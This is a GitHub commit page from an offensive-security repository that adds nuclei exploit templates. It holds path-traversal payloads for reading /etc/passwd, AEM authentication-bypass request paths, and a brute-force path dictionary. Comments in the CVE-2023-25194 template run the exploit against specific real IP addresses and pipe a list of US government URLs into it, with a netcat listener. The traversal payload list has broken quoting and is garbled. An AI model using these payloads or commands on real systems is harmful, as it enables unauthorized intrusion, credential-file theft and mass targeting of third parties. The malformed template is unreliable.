Skip to content

Commit

Permalink
add TPALL 2023-03-02
Browse files Browse the repository at this point in the history
  • Loading branch information
hktalent committed Mar 2, 2023
1 parent 87488d0 commit 2cccf37
Show file tree
Hide file tree
Showing 3,399 changed files with 119,575 additions and 4 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
8 changes: 8 additions & 0 deletions brute/dicts/filedic.txt
Original file line number Diff line number Diff line change
Expand Up @@ -7050,6 +7050,14 @@ $metadata
/example.php
/examples
/examples/
/conf5
/privacy/policy/ms/version
/v5/gc
/v5/gcf
/snsconf
/v5/gcl
/v4/imopenstat/im_native_sdk_report
/privacy/policy/authorization/status
/examples/index.html
/examples/jsp/index.html
/examples/jsp/jsp2/misc/config.jsp
Expand Down
2 changes: 1 addition & 1 deletion config/51pwn/CVE-2023-25194.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,7 @@ info:
nc -nlvp 9999
nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -debug -u http://176.79.33.152:7001
nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -debug -u http://135.181.39.55:8123
cat atckData/us_gov_httpx.json|jq '.url'|sed 's/"//g'|nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -v
cat atckData/us_gov_httpx.json|jq '.url'|sed 's/"//g'|sort -u|nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -json -o us_gov_CVE-2023-25194.json
reference:
- https://hackerone.com/reports/1529790
- https://github.com/ohnonoyesyes/CVE-2023-25194
Expand Down
110 changes: 110 additions & 0 deletions config/51pwn/TPALL/2.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,110 @@
id: Etc-file



info:
name: Etc File Read
author: Saimon
severity: high
description: Finds etc password files




requests:
- method: GET

path:
- |
- "{{BaseURL}}swd"
- "{{BaseURL}}passwd"
- "{{BaseURL}}tc/passwd{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}asswd"
- "{{BaseURL}}etc/passwd"
- "{{BaseURL}}.%2f/etc/passwd"
- "{{BaseURL}}.%2f..%2f/etc/passwd"
- "{{BaseURL}}.%2f..%2f..%2f/etc/passwd"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}e//etc/passwd"
- "{{BaseURL}}e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}swd"
- "{{BaseURL}}f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}2f/etc/passwd"
- "{{BaseURL}}2f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f..%252f..%252f/etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}/passwd"
- "{{BaseURL}}e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}swd"
- "{{BaseURL}}passwd"
- "{{BaseURL}}tc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}5c/etc/passwd"
- "{{BaseURL}}5c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c..%255c..%255c/etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}/passwd..%5c/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}asswd"
- "{{BaseURL}}etc/passwd"
- "{{BaseURL}}.%5c/etc/passwd"
- "{{BaseURL}}.%5c..%5c/etc/passwd"
- "{{BaseURL}}.%5c..%5c..%5c/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}e\/etc/passwd"
- "{{BaseURL}}e\%2e%2e\/etc/passwd"
matcher-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*] :0:0"
- "\\[(font|extension|file)s\\]"

part: body
13 changes: 13 additions & 0 deletions config/51pwn/TPALL/74cms-workflow.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
id: 74cms-workflow

info:
name: 74cms Security Checks
author: daffainfo
description: A simple workflow that runs all 74cms related nuclei templates on a given target.

workflows:
- template: technologies/fingerprinthub-web-fingerprints.yaml
matchers:
- name: 74cms
subtemplates:
- tags: 74cms
33 changes: 33 additions & 0 deletions config/51pwn/TPALL/AEM_misconfig.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
id: aem-misconfigs

info:
name: Misconfigs and Auth bypasses for older unpatched AEM versions not an exhaustive list but ones Ive had luck with
author: panch0r3d
severity: high

requests:
- method: GET
path:
- "{{BaseURL}}/apps/system/config/.tidy.-1.json?.css"
- "{{BaseURL}}/bin/querybuilder.json?path=/apps/system/config&p.hits=full&p.limit=-1?.js"
- "{{BaseURL}}/crx/de/index.jsp?.js"
- "{{BaseURL}}/crx/explorer/browser/index.jsp?.css"
- "{{BaseURL}}/crx/packmgr/index.jsp?.json"
- "{{BaseURL}}/bin/querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html"
- "{{BaseURL}}/bin/querybuilder.json?p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alastModifiedBy&property.operation=unequals&property.value=admin&type=nt%3abase&p.limit=1000&p.start=1?.js"
- "{{BaseURL}}/libs/granite/core/content/login.html?.ico"
- "{{BaseURL}}/etc/reports/diskusage.html?.html"
- "{{BaseURL}}///crx///de///index.jsp?.css"
- "{{BaseURL}}///bin///querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
matchers-condition: and
matchers:
- type: regex
regex:
- '(success).*?["][:](true).*?["](results)'
- '(CRXDE).(Lite)'
- '(Content).(Explorer)'
- '(CRX).(Package).(Manager)'
- '(Adobe)'
part: body
Loading

0 comments on commit 2cccf37

Please sign in to comment.